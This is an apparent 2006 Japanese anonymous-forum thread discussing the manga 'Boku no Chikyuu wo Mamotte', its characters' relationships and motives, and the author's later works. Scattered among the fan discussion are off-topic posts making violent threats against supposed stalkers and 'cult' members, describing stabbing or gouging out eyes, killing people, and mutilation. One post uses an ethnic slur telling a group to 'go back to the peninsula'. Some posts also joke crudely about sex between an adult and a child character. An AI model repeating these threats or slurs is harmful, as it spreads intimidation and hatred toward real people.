「(その時代では)未来の硬貨を公衆電話に突っ込む」みたいなエピをやるのに
必要だったからだろうか?確かに他のうてなのキャラではやりそうにないものね。

それ以前に、苺は学校の成績も含めてあまり頭が良くないと思ってたので、
他の二人も気づかない(気づいてたらそれについての会話が事前にあってもいいはず。
「公衆電話(自動販売機)は…」「あー、一応それも止めといた方がいいだろうな」とか)
↑の行動を思いついた所に驚いたw

270 :花と名無しさん:2006/09/06(水) 18:36:58 ID:???0
これって最後どうなったんだっけ?
持ってたけど覚えてないな。輪とかいう小学生の男の子が事故にあって
随分長いこと意識不明で、目が覚めてからどうなったんだっけ?


271 :花と名無しさん:2006/09/06(水) 19:28:45 ID:???0
うちの近所に小林輪店というのがあるんだけど、小林輪はいくらだろうか?

272 :花と名無しさん:2006/09/06(水) 21:37:07 ID:???0
>>269
穂波高校に受かったんだから、ああ見えて成績は良かったんじゃないの?
そうじゃなければ、苺は危機状況に陥った時スゴく知恵が回るタイプなんだよ。

あの高校、英語教育に力を入れていると言っていたから、純奈の母校かも知れないな。
ついでに氷樹母は、生前ここの英語教師をしていて(氷樹は本国の祖母の家に預けられ
育てられていた)それで時々物陰から芙雪一家を見守っていて、氷樹に父親と弟がいる事を
こっそり教えてあげていたという裏話があっても良かったな。



273 :花と名無しさん:2006/09/06(水) 22:08:13 ID:???0
蓮が生まれたときの年齢について
冷静さに欠けていたとか生でやるのはドキュみたいな意見が多いけど
恋愛ってそういうもんじゃないだろうか
好きで好きでたまらんって思いが溢れる時があって
本気で何の余裕もなくただ触れ合いたい様な時ってあると思う。
そしてそれを笑って受け止めたってことは
(まあ、双方家族に迷惑はかけたみたいだけど)
そこから生じる全ての結果を受け入れるつもりでやったって事で
うまく言えないけどそれが蓮の生まれるべきタイミングだったんじゃないかな。
世間的にまずくてもそれがありすと輪にとっては正解のタイミングだった
ってそう思ってやったんじゃないかって気がする

274 :花と名無しさん:2006/09/06(水) 22:22:44 ID:iA1nXw4u0
要するにあんた、私が大人しそうだからストーカーして
嫌がらせすれば自分の思い通りになると思ったんだろ?
残念でした。

昔から貴様みたいな創価者には思いきりやりかえすのが
自分の流儀でね

275 :花と名無しさん:2006/09/06(水) 22:29:25 ID:suVWATRc0
>>うちの近所に小林輪店というのがあるんだけど、小林輪はいくらだろうか?
ん?どっかでこのネタ見た事ある…。花夢掲載当時の雑誌欄外ネタか…。
はたまた読者ページの投稿だったか?びみょーに素人コネタパクり?


276 :花と名無しさん:2006/09/06(水) 23:55:22 ID:???0
自分達が他の人間にやったストーカー行為や嫌がらせは全部棚上げ。
自分達がちょっとでも反撃食らうととたんにもの凄く被害者ぶる。
だからあんたら嫌われてるんだよ、このゴキブリ寄生虫集団。
さっさと半島へ帰れ

277 :276:2006/09/06(水) 23:57:27 ID:???0
スマソ、誤爆

278 :花と名無しさん:2006/09/07(木) 03:04:21 ID:???O
ワロタw


>>270
あんた一巻しか読んでないじゃん
最後は全員仲直り
小学生輪と大学生ありすがセックスだよ

279 :花と名無しさん:2006/09/07(木) 03:09:10 ID:???0
270は、ぼく地球がコミクス何巻まであった作品(何年連載していた)か等を
全然知らないんだろうね…w 又はアニメで知った人かな?

280 :花と名無しさん:2006/09/07(木) 05:16:15 ID:???O
自分は木蓮×紫苑マンセーで、ありす×輪はどうしても好きになれなかった。
この板読んでて、木蓮嫌いな人が多すぎてびっくりした。
ひとりよがりなところはあるけど、その人間臭さが逆に好感もてたな。

それよりも、なんでありすと輪が結ばれたのか今でもよくわからない。お互いを好きになる、決定的なエピソードが足りないような気が自分的にはする。前世の話のインパクトが強すぎて、現世のエピの印象が薄く感じちゃうのかなぁ…


ぼく月は、絵柄や2chをちらっとみて、読まないことに決めますた

281 :花と名無しさん:2006/09/07(木) 09:08:45 ID:???O
ありすが輪に惚れた理由
・自分がベランダから突き落とした罪悪感
・紫苑さんへのミーハーな憧れ
・ブンさんちでチューされ服破かれてその気になる

輪がありすに惚れた理由
・木蓮のストーカーだから
・元からなついてたから
・おでん


これ以上思いつきません

282 :花と名無しさん:2006/09/07(木) 09:11:12 ID:???0
私は木蓮好きだったな…聖女風の時も、普通の女の子の時も。
当時のカラーイラスト、全部取ってあるよ。

280さんと同じく、ありす×輪はどうも違和感があって受け付けなかったw

283 :花と名無しさん:2006/09/07(木) 09:25:52 ID:???O
>>273
出来婚した人?
二十歳過ぎたいい大人が義務教育中の子供と避妊もせずにヤッたのもタイミングですか?
いや、避妊しても犯罪ですけどね

284 :花と名無しさん:2006/09/07(木) 09:31:26 ID:???0

もうちょっと、「なぜだか輪にひかれる」って様子を
織り交ぜて欲しかったね。

輪が年齢の割りに紳士的で(アリスに対しては)、
「輪くん あぁ見えて優しいよ」とアリスが微笑むシーンとか
紫苑をかばうために ウソをついて花をプレゼントしたのを見破るシーンとか
アリスがを気遣って婚約をみんなには隠してたりとか
アリスが泣いてるところを 小学生とは思えない言葉で慰め そばにいたりとか
日渡さんてきには、いろいろ織り込んだつもりかもしれない。






285 :花と名無しさん:2006/09/07(木) 10:09:48 ID:???0
>>284
その辺に関しては、読者は「輪=紫苑」という事や春を紫苑に仕立て上げて
前世の復讐をしようとしてる事とかを知ってるのにありすは何も知らない段階だったから、
純粋にありすを思いやってるのか自分の保身の為にいい人のフリをしてるのかが分かりにくいからじゃない?

結果的にはありすを騙してたのに、それをありすが輪を好きになった理由にされても、
読者としてはもにょるというか。

286 :花と名無しさん:2006/09/07(木) 11:00:02 ID:v7FL5jp90
結局、輪に紫苑の影がちらついてるから気になるんじゃないの?
アリスは誰ともくっつかない方が良かったけど。
過去から決別するのも有りだったな

287 :花と名無しさん:2006/09/07(木) 11:03:55 ID:???0
>>278
小学生でやったなんて描かれてないよ…。
何時の年齢でしたのかは作者は明らかにはしてない。思い込みで書いてはいかん。

288 :花と名無しさん:2006/09/07(木) 13:16:15 ID:???0
確か連載が終わった後に出た画集のラストに
読者からのリクエストが多かったとかで
すでに夫婦になった二人と生まれた息子の絵を
描いていたから、くっつける気マンマンだったんだろうと思う。
読者のほうもそういう空気だったんだろう。

でもやっぱりその辺は、くっつくかも?位に
匂わす程度で良かったんではないかな。
一成桜もなんとなくお互い好意を持ち出した、で
終わらせると。

289 :花と名無しさん:2006/09/07(木) 13:20:56 ID:SU8EMhJ90
>>278>>283
小学生とセクロスしたなんて描いてないじゃん。
マンガの出来事になにを本気でキレてるんだか。

290 :花と名無しさん:2006/09/07(木) 14:06:42 ID:???0
そういう風に取れる台詞もあったってことだろ。

291 :花と名無しさん:2006/09/07(木) 14:16:49 ID:???0
ああつまり私にナイフ常時携帯してほしくないってこと?
甘いよw

目つぶしくらいだったら安全ピンでもできるしw
いや急所だって安全ピンでつきさしまくれば、かなり痛いよね?w

292 :花と名無しさん:2006/09/07(木) 14:18:07 ID:???0
先の尖った折り畳み傘でもいいね。
まさか傘を銃刀法違反とは言えまいw

293 :花と名無しさん:2006/09/07(木) 14:50:45 ID:???0
このスレ、統合失調の人がいるみたい・・・

294 :花と名無しさん:2006/09/07(木) 15:03:01 ID:???0
>>278の最後の行は冗談というかネタのつもりだとは思うけどね。
ただ、>>290にもあるように前にその話題が出た時に、
「あの時にやっちゃってる」派も結構多かった気がするけど。

自分は、あの後輪が「別に法律で認められてなくても〜」と言ってるから、
入籍とかしなくてもお互いが本当に結婚してるつもりでいればいいじゃんという、
精神的な繋がりを表現したのだと思ってたけど。

295 :花と名無しさん:2006/09/07(木) 15:06:32 ID:???0
>>293
ストーカーの分際でよくいうなw
目玉傘でつかれて潰されないように注意しろよ

296 :花と名無しさん:2006/09/07(木) 15:24:08 ID:???0
は?マジで病院に行ったほうがいいよ
私も親の離婚でノイローゼになった時に被害妄想になったから・・・
ストーカーのせいで疑心暗鬼になってるなら警察に相談して解決したほうがいい

297 :花と名無しさん:2006/09/07(木) 15:48:53 ID:???0
ストーカー本人のくせによく言うわw
精神科に行ったらお前がやらせてるカルト教団の連中は
どんな危害加えられてもこっちは無罪放免だぞ
よく覚えておけ

298 :花と名無しさん:2006/09/07(木) 15:53:31 ID:???0
>296
本当にそうだったの?
それなら、こうなってる人には匿名掲示板では
下手にレス返さないのが賢明なことくらい
わかりそうなものだが

大体スレ違い

299 :花と名無しさん:2006/09/07(木) 15:54:32 ID:???0
>>291の意味がわからないんだけど誰へのレス?

300 :花と名無しさん:2006/09/07(木) 15:59:00 ID:???0
>>299
だからレスするなって

301 :花と名無しさん:2006/09/07(木) 15:59:08 ID:???0
>>298
ゴメン。ぼく地球が懐かしくて来てみたら不思議なレスがついてたから・・・

302 :花と名無しさん:2006/09/07(木) 15:59:56 ID:???0
>>299
カルト宗教の人は全員注意したほうがいいね、とだけ言っておくよw

303 :花と名無しさん:2006/09/07(木) 16:01:41 ID:???0
さんざん人をつけまわして嫌がらせほのめかしして来た宗教団体の人は
何されても仕方ないんじゃないの?w

304 :花と名無しさん:2006/09/07(木) 16:08:32 ID:???0
一人殺せば殺人犯だが、百人殺せば英雄だ

305 :花と名無しさん:2006/09/07(木) 17:22:22 ID:???0
削除依頼できないのかこいつら

306 :花と名無しさん:2006/09/07(木) 18:14:33 ID:???O
普通に頼めば出来るよ〜
いてら

307 :花と名無しさん:2006/09/07(木) 20:25:38 ID:???0
プw
小心者めw

308 :花と名無しさん:2006/09/07(木) 21:33:22 ID:???0
一人でも百人でも、殺人は殺人ですよ

309 :花と名無しさん:2006/09/07(木) 21:39:24 ID:???0
百人じゃなく百万人だしな、元のセリフは。

310 :花と名無しさん:2006/09/07(木) 21:52:14 ID:???0
カルトを100人殺せば英雄だろ?(クスクス

311 :花と名無しさん:2006/09/07(木) 21:53:34 ID:???0
宗教だのストーカーだのこのスレに関係ないことで進みすぎ

312 :花と名無しさん:2006/09/07(木) 21:55:19 ID:???0
というかなんでこんなレスの数々にマジレスする人がいるんだろ
それとも全員基地の自演?宗教とかストーカーとか心当たりある人そんなにいるの?

313 :花と名無しさん:2006/09/07(木) 22:05:14 ID:???O
スルー検定なんだよ!
気にせずぼく地球の話しようよ

314 :花と名無しさん:2006/09/07(木) 22:08:18 ID:???0
傘持った人もかたっぱしから逮捕してまわるつもり?www

315 :花と名無しさん:2006/09/07(木) 22:12:35 ID:???0
自分は読み方が浅かったせいか、作者マジックにかかってしまい
輪×亜梨子の組み合わせに疑問を持たなかったw
大人になってから読み返したり、2chに出入りするようになってから
いろんな解釈の仕方があると気付いた。

316 :花と名無しさん:2006/09/07(木) 22:14:37 ID:???0
とりあえず紫苑は人格障害というか中2病だったと思う

317 :花と名無しさん:2006/09/07(木) 22:21:16 ID:???0
シウのしたことってそんなにイケナイコト?
結果は残酷だったけどシオンのしてきたことを考えればそれくらいの報いは
自業自得の範疇だよなぁ・・・と思って読んでた。
今思えば私刑はいけないと思うけど心情的にはあまり変わらず・・・

318 :花と名無しさん:2006/09/07(木) 22:23:33 ID:???0
>>315
ビワタリさんは年の差カップル&出来婚・産まれちゃった婚萌えだからね。
それに>>264さんの言う通り花ゆめ自体高校生になれば
セクースOKのノリがあった事も否めないし。


319 :花と名無しさん:2006/09/08(金) 02:09:11 ID:???O
>>317
ちょっと魔がさしたって感じだったからね。まさか9年も…って春彦も言ってたし。

輪がはともかく、迅八が責めてたのはうざかった。

迅八も玉も、正しすぎてむかつく。正論で追い込まれた紫苑や春の気持ちが痛いほどわかる。
人間、誰だって闇がある。お綺麗事ではやっていけないときもあるのにね。

320 :花と名無しさん:2006/09/08(金) 02:56:11 ID:???0
>>319
私はスカっとしたw
迅八が責めた事に関しては当時から色々言われたみたいだけどね。

321 :花と名無しさん:2006/09/08(金) 04:42:15 ID:???O
ありすが覚醒しつつ熱で寝込んでるときに(アホな表現すまん)
母星消滅時に玉蘭が木蓮に無茶言って怒られた場面のとき
胸がスカッとした。

ギョクは自分のいやな面を見ない&見せない人だったからさ。

そのあと、「あのときはごめんね」と木蓮に謝ったからちょっと見直した。

322 :花と名無しさん:2006/09/08(金) 06:58:26 ID:???0
>>319-320
私も迅八が春を責めたのはウザイと思ったけど、
それは元々彼が正論を振りかざす奴だからと言うより、
「人の事言えないだろ」って思いから。

「殺してやる!」とすごい勢いで掴みかかって、その後のシュスランの言葉からしても、
他のメンバーが止めなければ本当に紫苑を殺しかねない感じだったみたいだし。
まあ口だけで殺意はなかったにしても充分言葉の暴力だし、
間違いなく半殺し程度にはボコボコにしたのでは。
それに数日間食事を与えないで放置してたってのも、
玉に限らずみんな紫苑に多少は殺意があったのでは?って気もするし。
秋が「みんなここには来たがらなかった」と言ってたし。

それにしても、親友を本気で怒らせて「殺してやる!」とまで言われた時、
紫苑は全く辛くなかったのだろうか?
作中では「お前にそのセリフを言わせてやりたかった!」みたいに、
してやったりって感じだったけど。これも歪んだ愛情?

323 :花と名無しさん:2006/09/08(金) 13:12:31 ID:???0
なんかお祭りあった?(´・ω・`)

324 :花と名無しさん:2006/09/08(金) 14:44:07 ID:???O
>>317
紫苑の罪って木蓮を凌辱したことにつきると思うけど、
当の木蓮が許して受け入れてる以上、秋が何かする権利は無いような。
木蓮が許した事も含めて、紫苑への憎しみに繋がってるんだろうけどさ。

まぁ心情は判るけども、怒りを直接紫苑にぶつけないところが、
嫌らしいなと思った当時。


325 :花と名無しさん:2006/09/08(金) 14:55:11 ID:???O
すまん追加。
紫苑は自業自得なところがあると思う。
ただ秋に罪が無いかどうかは、また別の話ってことで。


326 :花と名無しさん:2006/09/08(金) 14:56:24 ID:???0
>>324
いわゆる「姑息な手段」ってやつに思えた>秋
しかし、それこそ、若い時ならありがちな恋愛感情のもつれで
非常に人間らしい感情でもある。
そう言う意味でビワタリさんは、いろんなタイプの性格のキャラを
作り出して、上手いな〜と感心した記憶も…。

327 :花と名無しさん:2006/09/08(金) 15:04:48 ID:???O
>>326
確かに上手いね〜。
まぁ上で秋の事悪くは書いたけど、非常に人間臭いキャラではあるね。


328 :花と名無しさん:2006/09/08(金) 15:14:06 ID:???0
私は春くんが不憫で仕方なかった。
悪いことをすると地獄に落ちるを体現したキャラで彼も自業自得と言えば言えるんだけど。輪くんも。

329 :花と名無しさん:2006/09/08(金) 15:19:25 ID:???0
春には田村さんって味方がいたから、あんまり同情しなかった。
真実を知った上で誰も春のことを責めなかったらそれはそれでおかしいし、
あそこで迅八が責めたのは適役だったと思う。

330 :花と名無しさん:2006/09/08(金) 15:46:43 ID:???0
でもギョクにしたって、もしも最後の一人が自分で、かつワクチン製造の
技術があったら、誘惑に勝てたかどうか分からないわけで。
ギョクにはそのストッパーとして、両親や道徳心、木蓮への恋情以前に
紫苑への報われない友情があったわけだが。

紫苑の自業自得は当時からそう思ってた。木蓮陵辱、でなく
シュスランが泣きながら怒って言ったとおり、母性消滅・月孤立で
絶望しかないのに、閉塞の中、励ましあい未来を模索すべき時に
個人的な意趣のために、みんなに非常にイヤな思いをさせたから。
軟禁の上メシ抜きなんて可愛いほうだし、秋の「満足かい…?」は、
もはや怒りを通り越し、絶望しきった虚脱が感じられる。

331 :花と名無しさん:2006/09/08(金) 15:56:08 ID:???0
もしも逆に自分がシウの立場だったら、って考える程の余裕は無いと思う。
迅八というか、玉ってそういうキャラだし、そこまで考えることが出来る
出来た人間ばっかりだったら面白くないし、あそこで怒るキャラってのは
どうしても必要だったとは思う。
だから適役だって書いたんだけどね。

332 :花と名無しさん:2006/09/08(金) 16:09:50 ID:???0
玉は長いこと紫苑に粘着されて父親代わりをさせられるは、当て付け、八つ当たり、
その他散々なことをされてきてるのに復讐の鬼にならなかっただけで偉いw

333 :花と名無しさん:2006/09/08(金) 16:31:15 ID:???0
ギョクが男でなく、一成みたいに異性に転生していたら
果たしてシオン=輪はありすと女迅八のどっちを選ぶのか…w

334 :花と名無しさん:2006/09/08(金) 16:52:36 ID:???0
>>333
紫苑にとっての玉って、玉にとってのエンジュみたいなものかもよ。
仮に異性に転生しても、散々甘えて振り回してでも惚れるのは別の女(ありす)みたいな。

335 :花と名無しさん:2006/09/08(金) 16:59:09 ID:???O
>>330
玉は秋のような真似をする前に、紫苑につかみ掛かってると思う。
まぁ実際つかみ掛かってるわけだが。



336 :花と名無しさん:2006/09/08(金) 17:13:42 ID:???0
ギョクは直情径行型で怒りの感情も簡単に吐き出すので、
恨みを燻らせることは無いような気がする。

コッソリと恨みを晴らすというよりは、
直接殺しにかかるタイプなんじゃないかと。

>>333
結構二人の間で揺れるかも知れないねw
ま、でも月での最後の時を過ごした二人ということで、
最後は木蓮で。

337 :花と名無しさん:2006/09/08(金) 17:45:24 ID:???0
お前は罪のない精神科医のつもりかよ(嘲笑
別に凶器なんか持ってなくたって、素手で貴様の目玉くりぬくことできるぞ。

338 :花と名無しさん:2006/09/08(金) 18:02:32 ID:???0
紫苑キターーーーー

339 :花と名無しさん:2006/09/08(金) 18:29:55 ID:???0
やっぱりここってキャラに実在の人物を重ねて
鬱憤晴らしてるのがいるねw

340 :花と名無しさん:2006/09/08(金) 18:59:47 ID:???0
確かにやろうと思えば、どんなに非力でも素手で攻撃することも可能だね。

341 :花と名無しさん:2006/09/08(金) 19:06:49 ID:???0
お前がアクションとってきたときが楽しみだ

342 :花と名無しさん:2006/09/08(金) 19:52:37 ID:???0
自分の死を覚悟した極限状態だし、心情的には秋の気持ちも
わからないではないんだけど、ちょっとやりすぎだったとは思う。
木蓮が好きでたまらくて・・・っていうなら、木蓮だけでも
生き残ってほしい、木蓮を汚した紫苑なんて死んじゃえ!って
木蓮にワクチンうつ選択肢もあると思うのに、そこであえて憎い
紫苑を選んだってことは、一人だけにうつ結果をわかってて
やったってことでしょ?絶望や混乱のあまりやっちゃった、では
済まない悪意が垣間見える。

343 :花と名無しさん:2006/09/08(金) 20:20:11 ID:???0
でも秋って感染に気づくまでは自分にワクチンを打つつもりだったのだから、
宇宙に一人残される寂しさに関してはあまり考えてなかったんだよね?
紫苑に打つのを決めたのは、「木蓮と紫苑を出来るだけ長く引き離したい→
自分が先に死ぬより残される方がより辛いから紫苑に〜」だと思ってた。
しかも月基地では埋葬せずにポッドに入れて遺体にいつでも対面出来る状態だから、
愛する人の死という現実と常に向き合わざるを得ないし。

344 :花と名無しさん:2006/09/08(金) 20:34:20 ID:???0
そうだよね。
紫苑が悪意の塊だったからあまり目立たないけど秋もけっこうな悪意がある。
まぁ、極限状態の中での一瞬の出来心みたいなもんだとは思うけど、
紫苑を長年見てきていろいろと思うところもあったんだろうね。
とてもリアルなキャラだと思うよ秋は。

345 :花と名無しさん:2006/09/08(金) 20:38:50 ID:???O
自分の時は、とにかく「死ぬのが怖い」だったんじゃないかな
で、既に感染してるとわかってはじめて、一人残される寂しさを考えた感じ
それと、いろんな意味で木蓮を残したくなかったんではないかと。

346 :花と名無しさん:2006/09/08(金) 21:36:59 ID:???0
もし紫苑じゃなく木蓮にワクチンを打ち、メンバーの死後9年間生き延びて
1人だけ9歳年少で生まれ変わった亜梨子だったら、輪、迅八や一聖とどうやって
知り合うのかな。

347 :花と名無しさん:2006/09/08(金) 23:26:00 ID:???0
>>346
亜梨子が輪と同じマンションのお隣さんになることは、
多分予定調和かと。

輪が迅八と一成と同じ高校の同級生というのは
ちょっと想像つかないが、
漫画的にはそういうことになるんだろう。


348 :花と名無しさん:2006/09/08(金) 23:34:24 ID:???O
話豚義理ゴメンなさい
アクマ君シリーズの結末を知っている人いたら教えて〜〜〜〜!!!!!!!!!!!!!!

349 :花と名無しさん:2006/09/08(金) 23:42:11 ID:???0
ショタコン漫画じゃなくてロリコン漫画になっちゃうんだな。
そしてリア女子高生のありすが妊娠してケコーンして蓮が生まれる。
女は16でケコーン出来るからセーフ           なのか?そうなのか?なんか違う。

350 :花と名無しさん:2006/09/08(金) 23:44:09 ID:???0
>>344
悪意というか、自分の精神的な限界を超える状況に放り込まれ続けて
結局は場当たり的な対応しか出来ずに死んだような。
なんら人にも自分にも誇れることを出来ずに死んだので、転生してもああいうウジウジ泣くだけの人間になってしまったと。
まして自分が悪意を向けてしまった相手の姿で生まれてしまったからには。

351 :花と名無しさん:2006/09/09(土) 00:29:03 ID:???0
>>348
アクマ君シリーズって…結末って言うか…あれは未完な訳で。
各エピソード(○○編)の終わりならあるだろうけど。
「アクマくん魔法☆BITTER」の結末?

352 :花と名無しさん:2006/09/09(土) 00:32:42 ID:???0
ありすと輪のラヴラヴぶりを見せ付けられ嫉妬に狂った春が

353 :花と名無しさん:2006/09/09(土) 00:59:00 ID:???O
思いあまってありすを

354 :花と名無しさん:2006/09/09(土) 01:08:29 ID:???0
パス↓   続編で輪と春が茶飲み友達になっててビビッタ

355 :花と名無しさん:2006/09/09(土) 04:21:48 ID:???O
カマ言葉でねちねちいじめたあげく

356 :花と名無しさん:2006/09/09(土) 07:43:56 ID:???0
さらに激しくありすを

357 :花と名無しさん:2006/09/09(土) 08:16:20 ID:???0
緊縛して

358 :花と名無しさん:2006/09/09(土) 09:32:08 ID:???O
次の瞬間すぐほどいたかと思うと
そこへ桜が

359 :花と名無しさん:2006/09/09(土) 10:45:10 ID:???0
シオンと木蓮が逆で、
木蓮の転生が9年遅かった場合、
輪やジンパチがロリってことになるから、問題ある漫画になりそう。
だからきっと、やっぱり輪が遅く生まれるべきだったのね。



360 :花と名無しさん:2006/09/09(土) 13:09:03 ID:???0
じゃあシオンと木蓮が逆だったら、ぼく地球は「変態どもの巣」になっていたのか。
必然性があってそうしたのね。日渡さん。

ところで、うてなの夏寿輝と氷樹は何故出来婚になったのかな?遊び人の夏寿輝はともかく
真面目でそういう事はしっかりしていそうな氷樹がね。亜梨子と輪の産まれ婚よりハァ?となったよ。

@麒麟に早く運命の人、貴優に会わせたかったから
A麒麟の方が早く貴優に会いたくて、2人を操ってそう仕向けた
B健達の行方不明事件で精神的に参っていた時、そういう雰囲気になってしまった
C氷樹の母方の親戚が2人の結婚に反対して、強引に氷樹の結婚話を持ってきた

この2人は大人のカップルだから、する事をするなという方が無理だけど
健母の死から1年も経っていないのに時期を考えられないのか?と思ったんだよ。

361 :花と名無しさん:2006/09/09(土) 16:50:50 ID:???0
>>360
どの理由も有り得そうだけど、それ以前に日渡さんが健の母の死を
中盤以降からスルーしてるだけの気もする。

362 :花と名無しさん:2006/09/09(土) 17:45:04 ID:???0
輪とありすの年齢が入れ替わったロリ設定、見てみたかった気もする(*´ω`)

が・・・木蓮て歌いながらすごい長生きしてそうだ。

363 :花と名無しさん:2006/09/09(土) 18:10:42 ID:???0
でも辛い事には慣れて来た紫苑でさえ
9年の月日の間に狂ってしまったのだから、
やはり他のメンバーよりは色々あったとはいえ、
紫苑よりは幸せな人生を送って来たはずの木蓮は
もっとおかしくなってしまうのでは。

それとも紫苑が狂ったのは秋に騙されたという失望や恨みもあったからで、
それさえなければ何とか耐えられたのか、
木蓮は人間の仲間がいなくなっても植物と会話出来る分、
まだ寂しさに耐えられるのか。

364 :花と名無しさん:2006/09/09(土) 18:14:20 ID:???0
最後に基地に残される辛さって、誰も自分を看取ってくれない、
誰も埋葬してくれないってのもあるよね。

紫苑は植物の肥料になって骸骨になった事になってるけど、
基地には動物や昆虫は一切いなかったのかな?
植物や泥水があったって事はバクテリア位はいたのだろうけど。

365 :花と名無しさん:2006/09/09(土) 18:20:52 ID:???0
最後に残ったのが、
玉×紫苑(お互い好きなのに素直になれなかった同性の組み合わせ)、
木蓮×シュスラン(おそらく一番仲が悪い同性の組み合わせ)、
柊(秋)×エンジュ(接点が少なく、お互い別の人を想っていた異性の組み合わせ)
だったらどんな関係を築いていたのか気になるw

366 :花と名無しさん:2006/09/09(土) 18:42:51 ID:???O
>>363
なんとなく後者のような気がした。

>>365
シュスランと木蓮は互いに腹割って話せれば、
実は結構仲良くなるんじゃないかと思った。

桜と亜梨子の場合は、仲良くなるところが想像つかないんだけどね。
続編読んでないから、今どんなもんかわからんけど。


367 :花と名無しさん:2006/09/09(土) 18:46:02 ID:???0
しかし自分が発狂死したのを(性格には発病して死んじゃったんだけど)覚えてるって
もの凄く辛いね。
それを覚えてる上に「不幸になっちゃだめだ」って言葉まで覚えてるのも重いな…。

368 :花と名無しさん:2006/09/09(土) 18:57:54 ID:???0
>>366
同感。もっと時間があれば 木蓮が紫苑に子供みたいな
不器用な片思いをしてるのもわかったろうし
(気付いてはいたけどちょっと悪意のある受け止め方だったよね)
それで木蓮が自分たちと同じように、あるいはもっと馬鹿で不器用な
人間であることにも気付いたんじゃないかと思う。
そしたら姉御肌で面倒見のいいところのあるシュスランは
木蓮といい友達になれたような気がする。

369 :花と名無しさん:2006/09/09(土) 19:01:22 ID:???O
ラズロとキャーが生きてたら、紫苑はどんなに幸せだったかなぁ。
…と、それじゃ話が続かないんだけどw

ラズロとキャーのエピソードは作品全体で一番泣けた。


370 :花と名無しさん:2006/09/09(土) 19:08:15 ID:???0
最近 ぼくたま読み返して思ったけど、
仲間たちが次々死んでいき、とうとう発病してしまった秋海棠が、
カップルになった紫苑と木蓮がいちゃつくのを見るのは、
地獄だったんじゃないかな・・・。一人だけの孤独より他人がいながらの
孤独は、相当なもんだよ。


371 :花と名無しさん:2006/09/09(土) 19:34:31 ID:???0
どっちも比べようが無いな。
1人だけの孤独と他人がいながらの孤独のどちらが、っていうのは。
シウは前者、紫苑は後者だけど、どっちが不幸かなんてね。

372 :花と名無しさん:2006/09/09(土) 19:35:13 ID:???0
間違えた。
紫苑が前者、シウが後者。

373 :花と名無しさん:2006/09/09(土) 19:48:50 ID:???0
前世の仲間に復讐しまくる亜梨子(九歳)というのも見てみたかったな……

374 :花と名無しさん:2006/09/09(土) 21:07:31 ID:???O
“なれし故郷を放たれて夢に楽土求めたり”
これが背景にかぶさりながら悪鬼笑いをする幼いありす

375 :270:2006/09/09(土) 21:50:46 ID:???0
違う違う、ちゃんと読んだよ、全部もってた。
輪が意識不明でいる間、前世の記憶取り戻して、気がついた後も
そのこと黙ってて、ありすを観察。
でも確かラストが印象的でなくて忘れたのすっかり。
アニメあるなんてもしらんかったし。というわけで、手に入るなら全部呼んでみるよ
輪と高校生カップルには萌えたから

376 :花と名無しさん:2006/09/09(土) 21:56:53 ID:???0
他人がいながらの孤独って
紫苑は少年時代にさんざん味わってるからねぇ・・・

377 :花と名無しさん:2006/09/09(土) 22:24:49 ID:???0
ボクを包む月の光

作風思いっきり変わった・・・というか、劣化した
ボーイズラブ系っぽくて吐き気がする
スクリーントーンも乱用するし完成度も低い
作品本体は1−3に限っては悪くないが
それ以後がちょっとダメ

378 :花と名無しさん:2006/09/09(土) 23:25:19 ID:???0
キャラの名付けが相変わらずというか・・・

379 :花と名無しさん:2006/09/09(土) 23:42:49 ID:???0
ボクを包む月の光はぼく球の同人漫画だろ、どう見ても(まだ今の同人のがレベル高い)

380 :花と名無しさん:2006/09/10(日) 00:17:04 ID:???0
ボク月は割り切って読めばそれなりに楽しめるよ。
うてなの後半以降からの作品に比べたら全然マシ。

381 :花と名無しさん:2006/09/10(日) 01:19:02 ID:???0
うてな後半から確かに酷かったな・・・つか、花ゆめ初期の漫画家は他の雑誌いったか、
絵柄が酷くなってもしがみ付いてるやつばっかだな

382 :花と名無しさん:2006/09/10(日) 01:19:07 ID:???0
昔好きだったけど絵についていけない

383 :花と名無しさん:2006/09/10(日) 02:03:41 ID:???0
全然絵が違うもんな・・・

384 :花と名無しさん:2006/09/10(日) 04:19:01 ID:???0
ミクロが一番好きだった。あと田村さん。
輪とかありすはあまり好きではなかったけど、当時(今も?)すごい人気あったんだよな。
ぱふとかでも上位ランクされてたし。

385 :花と名無しさん:2006/09/10(日) 05:06:08 ID:???O
ぱふ?マジックドラゴン?

386 :花と名無しさん:2006/09/10(日) 07:45:26 ID:???0
実姉を脳内ヒロインにしてハァハァしてる辺りまでは面白かったです

387 :花と名無しさん:2006/09/10(日) 08:38:48 ID:???0
大介って顔も性格もそれなりにマトモで、しかも東大出てるのに女に全然縁がなかったのかな?
たまに仲間内で会うだけの既婚者ありすをよりによって好きになるなんて。
あくまでも輪の推測だけど、それにしたってずっと彼女もいなさそうなのは不自然。
本編ラストの「これからが僕の青春さ」は恋愛含めてだと思ったのに。

春に関してはあのルックスだし中学校での女生徒の反応からしてモテなかった訳ないだろうけど、
心臓の持病の事もあって恋愛には臆病になってるだろうから、
逆に望みのないありすに片思いして自分を納得させてる面もあるのだろうけど。

388 :花と名無しさん:2006/09/10(日) 11:16:41 ID:???0
心臓は治ったんだと思ってた
発作が治まっただけで悪いの?

389 :花と名無しさん:2006/09/10(日) 11:42:20 ID:???0
>>387
微妙に押し付けがましい性格はイヤだが、それほど変というわけでもないしな。
逆に東大出身で、学生時代はダブルスクールやら何やらに追われて恋愛する暇もなかったのかも知れん。

390 :花と名無しさん:2006/09/10(日) 13:02:26 ID:???0
>>388
現在は症状が落ち着いているだけじゃないの?

>>386
それは誰の事?

391 :花と名無しさん:2006/09/10(日) 13:04:06 ID:???0
苺と氷樹が混ざってるんでは

392 :花と名無しさん:2006/09/10(日) 13:24:50 ID:???0
>>391
第一部で氷樹を第二脳内ヒロインにしてたけど、
その設定は作者の脳内で無かったことにされて残念。
いいじゃん姉弟ラヴ。

393 :花と名無しさん:2006/09/10(日) 13:41:10 ID:???O
>>385
ぱふってぱふじゃないの?

394 :花と名無しさん:2006/09/10(日) 15:38:31 ID:???0
彼に何かしてみろ。
てめえ本気でやるからな。

395 :花と名無しさん:2006/09/10(日) 15:49:31 ID:???0
本気で殺してやろうか
ベッドに誘うふりして急所ひきちぎってやろうかw

396 :花と名無しさん:2006/09/10(日) 15:57:34 ID:???0
殺されないように気をつけろよ、
お前もお前のカルトな仲間もw

397 :花と名無しさん:2006/09/10(日) 16:01:35 ID:???0
>>385
雑草社発行の「まんが情報誌ぱふ」だと思われ。ttp://www.zassosha.co.jp/

398 :花と名無しさん:2006/09/10(日) 16:03:56 ID:???O
>>397
超d
鈍くてごめん

